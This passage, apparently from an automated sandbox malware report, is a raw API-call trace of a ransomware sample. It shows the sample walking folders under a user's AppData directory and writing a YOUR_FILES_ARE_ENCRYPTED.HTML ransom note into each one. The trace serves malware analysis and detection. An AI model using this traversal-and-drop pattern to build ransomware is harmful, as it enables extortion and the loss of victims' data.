cAlternateFileName="")) returned 1 [0114.656] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.656] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC") returned 91 [0114.656] GetProcessHeap () returned 0x600000 [0114.656] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.657] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC" [0114.657] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\*" [0114.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.659] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.659] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0114.659] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.659] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache") returned 101 [0114.659] GetProcessHeap () returned 0x600000 [0114.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.660] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache" [0114.660] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache\\*" [0114.660] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.661] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 1 [0114.661] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 0 [0114.661] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.662] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0114.662] GetProcessHeap () returned 0x600000 [0114.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.663] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.664] CloseHandle (hObject=0x32c) returned 1 [0114.664] GetProcessHeap () returned 0x600000 [0114.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.665] GetProcessHeap () returned 0x600000 [0114.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.665] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0114.665] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.666] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies") returned 103 [0114.666] GetProcessHeap () returned 0x600000 [0114.666] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.667] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies" [0114.667] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies\\*" [0114.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.668] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 1 [0114.668] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 0 [0114.668] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.668] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0114.668] GetProcessHeap () returned 0x600000 [0114.668] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.669] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.743] CloseHandle (hObject=0x32c) returned 1 [0114.743] GetProcessHeap () returned 0x600000 [0114.743] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.743] GetProcessHeap () returned 0x600000 [0114.743] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.744] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0114.744] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.744] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory") returned 103 [0114.744] GetProcessHeap () returned 0x600000 [0114.744] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.745] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory" [0114.746] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory\\*" [0114.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0114.746] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 1 [0114.746] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 0 [0114.746] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0114.746] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0114.746] GetProcessHeap () returned 0x600000 [0114.746] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.747] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.748] CloseHandle (hObject=0x32c) returned 1 [0114.749] GetProcessHeap () returned 0x600000 [0114.749] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.749] GetProcessHeap () returned 0x600000 [0114.749] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.749] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="Temp", cAlternateFileName="")) returned 1 [0114.750] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.750] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp") returned 96 [0114.750] GetProcessHeap () returned 0x600000 [0114.750] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.751] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp" [0114.751] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp\\*" [0114.751] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.751] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 1 [0114.751] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 0 [0114.751] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.751] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0114.751] GetProcessHeap () returned 0x600000 [0114.751] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.752] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.753] CloseHandle (hObject=0x32c) returned 1 [0114.753] GetProcessHeap () returned 0x600000 [0114.753] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.753] GetProcessHeap () returned 0x600000 [0114.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.754] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x611c8b13, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611c8b13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611c8b13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="Temp", cAlternateFileName="")) returned 0 [0114.754] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.754] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0114.754] GetProcessHeap () returned 0x600000 [0114.754] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.755] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, 